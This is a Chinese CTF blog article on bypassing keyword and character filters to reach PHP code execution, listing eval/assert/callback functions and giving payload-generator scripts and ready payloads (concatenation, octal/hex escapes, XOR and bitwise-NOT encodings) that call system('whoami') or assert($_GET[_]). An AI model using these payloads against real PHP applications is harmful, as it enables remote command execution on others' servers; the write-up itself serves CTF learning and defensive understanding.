浅谈PHP代码执行中出现过滤限制的绕过执行方法
本篇文章总结于本人在CTF比赛中碰到的各种代码执行绕过方法
文章目录
- 代码执行函数
- 可回调函数
- 字符串拼接绕过
- 字符串转义绕过
- 多次传参绕过
- 内置函数访问绕过
- 异或绕过
- URL编码取反绕过
代码执行函数
首先来看看在PHP
中有哪些函数有代码执行的功能
eval()
最常见的代码执行函数,把字符串 code 作为PHP代码执行。
eval ( string $code ) : mixed
assert()
检查一个断言是否为false
PHP 5
assert ( mixed $assertion [, string $description ] ) : bool
PHP 7
assert ( mixed $assertion [, Throwable $exception ] ) : bool
assert()
会检查指定的assertion
并在结果为false
时采取适当的行动。在PHP5
或PHP7
中,如果assertion
是字符串,它将会被assert()
当做PHP
代码来执行。
preg_replace()+/e
执行一个正则表达式的搜索和替换
preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed
搜索subject
中匹配pattern
的部分,以replacement
进行替换。如果pattern
的模式修饰符使用/e
,那么当subject
被匹配成功时,replacement
会被当做PHP代码执行
PS:
preg_replace()+
函数的/e
修饰符在PHP7
中被移除
create_function()
创建一个匿名(lambda样式)函数
create_function ( string $args , string $code ) : string
根据传递的参数创建一个匿名函数,并为其返回唯一的名称。如果没有严格对参数传递进行过滤,攻击者可以构造payload传递给create_function()
对参数或函数体
闭合注入恶意代码导致代码执行
可回调函数
array_map()
为数组的每个元素应用回调函数
array_map ( callable $callback , array $array , array ...$arrays ) : array
返回数组,是为array
每个元素应用callback
函数之后的数组。 array_map()
返回一个array
,数组内容为array1
的元素按索引顺序为参数调用callback
后的结果(有更多数组时,还会传入arrays
的元素)。 callback
函数形参的数量必须匹配array_map()
实参中数组的数量。
call_user_func()
把第一个参数作为回调函数调用
call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] ) : mixed
第一个参数callback
是被调用的回调函数,其余参数是回调函数的参数。
call_user_func_array()
调用回调函数,并把一个数组参数作为回调函数的参数
call_user_func_array ( callable $callback , array $param_arr ) : mixed
把第一个参数作为回调函数callback
调用,把参数数组作param_arr
为回调函数的的参数传入。跟array_map()
相似
array_filter()
用回调函数过滤数组中的单元
array_filter ( array $array [, callable $callback [, int $flag = 0 ]] ) : array
依次将array
数组中的每个值传递到callback
函数。如果callback
函数返回true
,则array
数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。
usort()
使用用户自定义的比较函数对数组中的值进行排序
usort ( array &$array , callable $value_compare_func ) : bool
本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数。
当PHP < 5.6
时
当PHP >= 5.6 & PHP < 7
时,php有一个参数变长
特性
等等还有很多函数参数是可回调的,就不一一列举了。
接下来根据各种过滤情况来看看具体的一些绕过方法
字符串拼接绕过
字符串拼接绕过适用于绕过过滤具体关键字的限制
适用PHP版本:
PHP>=7
Payload:
(p.h.p.i.n.f.o)();
(sy.(st).em)(whoami);
(sy.(st).em)(who.ami);
(s.y.s.t.e.m)("whoami");
.......
在PHP中不一定需要
引号(单引号/双引号)
来表示字符串。PHP支持我们声明元素的类型,比如$name = (string)mochu7;
,在这种情况下,$name
就包含字符串"mochu7"
,此外,如果不显示声明类型,那么PHP会将圆括号内的数据当成字符串
来处理
字符串转义绕过
适用PHP版本:
PHP>=7
以八进制表示的\[0–7]{1,3}
转义字符会自动适配byte(如"\400" == “\000”
)
以十六进制的\x[0–9A-Fa-f]{1,2}
转义字符表示法(如“\x41"
)
以Unicode表示的\u{[0–9A-Fa-f]+}
字符,会输出为UTF-8字符串
注意这里转义后的字符必须双引号包裹传参
Payload处理脚本如下:
# -*- coding:utf-8 -*-def hex_payload(payload):res_payload = ''for i in payload:i = "\\x" + hex(ord(i))[2:]res_payload += iprint("[+]'{}' Convert to hex: \"{}\"".format(payload,res_payload))def oct_payload(payload):res_payload = ""for i in payload:i = "\\" + oct(ord(i))[2:]res_payload += iprint("[+]'{}' Convert to oct: \"{}\"".format(payload,res_payload))def uni_payload(payload):res_payload = ""for i in payload:i = "\\u{{{0}}}".format(hex(ord(i))[2:])res_payload += iprint("[+]'{}' Convert to unicode: \"{}\"".format(payload,res_payload))if __name__ == '__main__':payload = 'phpinfo'hex_payload(payload)oct_payload(payload)uni_payload(payload)
Payload
"\x70\x68\x70\x69\x6e\x66\x6f"();#phpinfo();
"\163\171\163\164\145\155"('whoami');#system('whoami');
"\u{73}\u{79}\u{73}\u{74}\u{65}\u{6d}"('id');#system('whoami');
"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');
.......
另外,八进制的方法可以绕过无字母传参
进行代码执行
"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');
多次传参绕过
适用PHP版本:
无限制
如果过滤了引号(单引号/双引号)
,可以通过以下方法绕过
GET:
?1=system&2=whoami
POST:
cmd=$_GET[1]($_GET[2]);
cmd=$_POST[1]($_POST[2]);&1=system&2=whoami
如果PHP版本大于7
这里还可以用拼接的方法绕过过滤引号
(sy.st.em)(whoami);
另外如果碰到参数长度受限制,也可以通过多次传参的方法绕过参数长度限制或者回调函数
回调函数可能大部分看限制的具体长度,但是在PHP >= 5.6 & PHP < 7
时对以上过滤方法可以绕过
内置函数访问绕过
适用于PHP版本:Windows本地测试的是
PHP>=7
可以成功,PHP5
测试虽然报错但是并不肯定不能使用
get_defined_functions()
:返回所有已定义函数的数组
详情见:https://www.php.net/manual/zh/function.get-defined-functions.php
利用这种方法首先还需要知道PHP的具体版本,因为每个版本的get_defined_functions()
返回的值都是不一样的,这里以php7.4.3
为准
异或绕过
适用PHP版本:
无限制
在PHP中两个字符串异或之后,得到的还是一个字符串。
例如:我们异或 ?
和 ~
之后得到的是 A
字符:? ASCII码:63 二进制: 0011 1111
字符:~ ASCII码:126 二进制: 0111 1110
异或规则:
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
1 XOR 1 = 0
上述两个字符异或得到 二进制: 0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A
接下来看一道例题:
<?php
highlight_file(__FILE__);
error_reporting(0);
if(preg_match('/[a-z0-9]/is', $_GET['shell'])){echo "hacker!!";
}else{eval($_GET['shell']);
}
?>
过滤了所有英文字母和数字
,但是我们知道ASCII码中还有很多字母数字之外的字符
,利用这些字符进行异或可以得到我们想要的字符
PS:取ASCII表种非字母数字的其他字符,要注意有些字符可能会影响整个语句执行,所以要去掉如:反引号,单引号
脚本如下:
# -*- coding: utf-8 -*-payload = "assert"
strlist = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 93, 94, 95, 96, 123, 124, 125, 126, 127]
#strlist是ascii表中所有非字母数字的字符十进制
str1,str2 = '',''for char in payload:for i in strlist:for j in strlist:if(i ^ j == ord(char)):i = '%{:0>2}'.format(hex(i)[2:])j = '%{:0>2}'.format(hex(j)[2:])print("('{0}'^'{1}')".format(i,j),end=".")breakelse:continuebreak
一次代码执行只能得到我们想要执行语句的字符串,并不能执行语句,所以需要执行两次代码执行,构造
assert($_GET[_]);
使用脚本对每个字母进行转换,然后拼接
$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');
//$_='assert';
$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');
//$__='_GET';
$___=$$__;
//$___='$_GET';
$_($___[_]);
//assert($_GET[_]);
payload
$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');$___=$$__;$_($___[_]);&_=phpinfo();
经本地测试,发现这种方法可以在php5
以及php7.0.9
版本种使用,因为assert()
的问题,并不是异或不能使用
注:PHP5
低版本有些可能因为magic_quotes_gpc
开启的关系导致无法利用
当过滤字符的范围没有那么大,或者只是过滤关键字的时候可以使用如下脚本
# -*- coding: utf-8 -*-
import stringchar = string.printable
cmd = 'system'
tmp1,tmp2 = '',''
for res in cmd:for i in char:for j in char:if(ord(i)^ord(j) == ord(res)):tmp1 += itmp2 += jbreakelse:continuebreak
print("('{}'^'{}')".format(tmp1,tmp2))
PS C:\Users\Administrator> php -r "var_dump('000000'^'CICDU]');"
Command line code:1:
string(6) "system"
再放个网上看到的payload
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
//${_GET}{%ff}();&%ff=phpinfo
URL编码取反绕过
适用PHP版本:无限制
还是上面那个例题
当PHP>=7
时,可以直接利用取反构造payload
PS C:\Users\Administrator> php -r "var_dump(urlencode(~'phpinfo'));"
Command line code:1:
string(21) "%8F%97%8F%96%91%99%90"
(~%8F%97%8F%96%91%99%90)();
#phpinfo();
有参数的
PS C:\Users\Administrator> php -r "var_dump(urlencode(~'system'));"
Command line code:1:
string(18) "%8C%86%8C%8B%9A%92"
PS C:\Users\Administrator> php -r "var_dump(urlencode(~'whoami'));"
Command line code:1:
string(18) "%88%97%90%9E%92%96"
payload
(~%8C%86%8C%8B%9A%92)(~%88%97%90%9E%92%96);
#system('whoami');
当5<=PHP<=7.0.9
时,需要再执行一次构造出来的字符,所以参考上面那种异或拼接
的方法
$_=(~'%9E%8C%8C%9A%8D%8B');$__='_'.(~'%AF%B0%AC%AB');$___=$$__;$_($___[_]);
#assert($_POST[_]);
参考链接:
- https://www.anquanke.com/post/id/168667
- https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
- https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html
- https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
浅谈PHP代码执行中出现过滤限制的绕过执行方法相关推荐
- 浅谈线程池(中):独立线程池的作用及IO线程池
在上一篇文章中,我们简单讨论了线程池的作用,以及CLR线程池的一些特性.不过关于线程池的基本概念还没有结束,这次我们再来补充一些必要的信息,有助于我们在程序中选择合适的使用方式. 独立线程池 上次我们 ...
- 浅谈surging服务引擎中的rabbitmq组件和容器化部署
1.前言 上个星期完成了surging 的0.9.0.1 更新工作,此版本通过nuget下载引擎组件,下载后,无需通过代码build集成,引擎会通过Sidecar模式自动扫描装配异构组件来构建服务引擎 ...
- 嵌入式开发-浅谈嵌入式MCU开发中的三个常见误区
浅谈嵌入式MCU开发中的三个常见误区 原创 2017-09-30 胡恩伟 汽车电子expert成长之路 目录 (1)嵌入式MCU与MPU的区分 (2)误区一:MCU的程序都是存储在片上Flash上,然 ...
- 浅谈数字媒体艺术中的技术应用-4-技术路线和学习地图
我们先来看下制作一个互动展示装置的设计思路和技术实现. 当我们大脑里面有一个点子之后,怎么最终输出成一个互动展示装置呢?首先我们需要设计一个外观造型,其次我们需要评估一下这个装置的互动方式,是用VR眼 ...
- python语法中infile语句_浅谈pymysql查询语句中带有in时传递参数的问题
直接给出例子说明: cs = conn.cursor() img_ids = [1,2,3] sql = "select img_url from img_url_table where i ...
- python查询数据库带逗号_浅谈pymysql查询语句中带有in时传递参数的问题
直接给出例子说明: cs = conn.cursor() img_ids = [1,2,3] sql = "select img_url from img_url_table where i ...
- python模型保存save_浅谈keras保存模型中的save()和save_weights()区别
今天做了一个关于keras保存模型的实验,希望有助于大家了解keras保存模型的区别. 我们知道keras的模型一般保存为后缀名为h5的文件,比如final_model.h5.同样是h5文件用save ...
- 浅谈数字媒体艺术中的技术应用-3-工具介绍(二)
上一篇文章介绍了数据可视化工具Processing和OpenFrameWorks,以及开源电子硬件Arduino和RaspberryPI.这一篇继续把剩下的几个工具进行逐一的介绍. 商用游戏引擎:Un ...
- matlab 2015 积分,浅谈MATLAB在数值积分中的应用
<浅谈MATLAB在数值积分中的应用.doc>由会员分享,可免费在线阅读全文,更多与<浅谈MATLAB在数值积分中的应用>相关文档资源请在帮帮文库(www.woc88.com) ...
最新文章
- Android CursorAdapter
- Bootstrap系列 -- 37. 基础导航样式
- mysql记录当前表数据的数据条数据类型_MySQL学习记录:数据类型与操作数据表...
- composer QA
- 心系冬奥 翰墨传情 |当代书画名家为奥运加油书画推介展【姜萌篇】
- python实现的广域网聊天(无需搭建服务器,基于FICS和socket模块)
- 线性代数(四)n维向量
- premiere cs6导出视频格式
- 【小小干货】如何寻找综述性论文?
- 赤手空拳如何成就百万富翁?——网络营销之七(第四招:百度文库+QQ群)
- 如何检查内存泄露问题
- 【2018年12月10日】A股最便宜的股票
- pycharm创建python工程_使用Pycharm(Python工具)新建项目及创建Python文件的教程
- 20万到100万年薪的算法工程师有什么区别?
- 启动异常:java.lang.NoClassDefFoundError: org/apache/curator/framework/CuratorFrameworkFactory 解决方法
- HTML基础知识(五)——position定位
- pandas按半小时区间分组统计
- android系统精简,高通支持Android 8.1精简版,专为512MB或1GB内存设计
- 31条指令单周期cpu设计(Verilog)-(三)指令分析
- 火狐如何设置新打开链接不在当前页加载而是在新标签页?
热门文章
- shell脚本实战-实现磁盘使用率超过90%就告警的三种方法v1版
- linux网络性能测试工具Iperf使用介绍
- fortran使用MKL函数库计算一个复数向量的共轭与另一个复数向量的内积
- Rowhammer Test for DRAM
- Html中使用jquery通过Ajax请求WebService接口以及跨域问题解决
- 逼疯小丑的罪魁祸首找到了!@平安哥谭。
- DES加密算法|密码学|网络空间安全
- linux typeof 头文件,C语言typeof详解
- halcon 二值形态学 计算小颗粒数目例子
- 中级软件测试笔试题100精讲_(完整版)软件测试笔试题及答案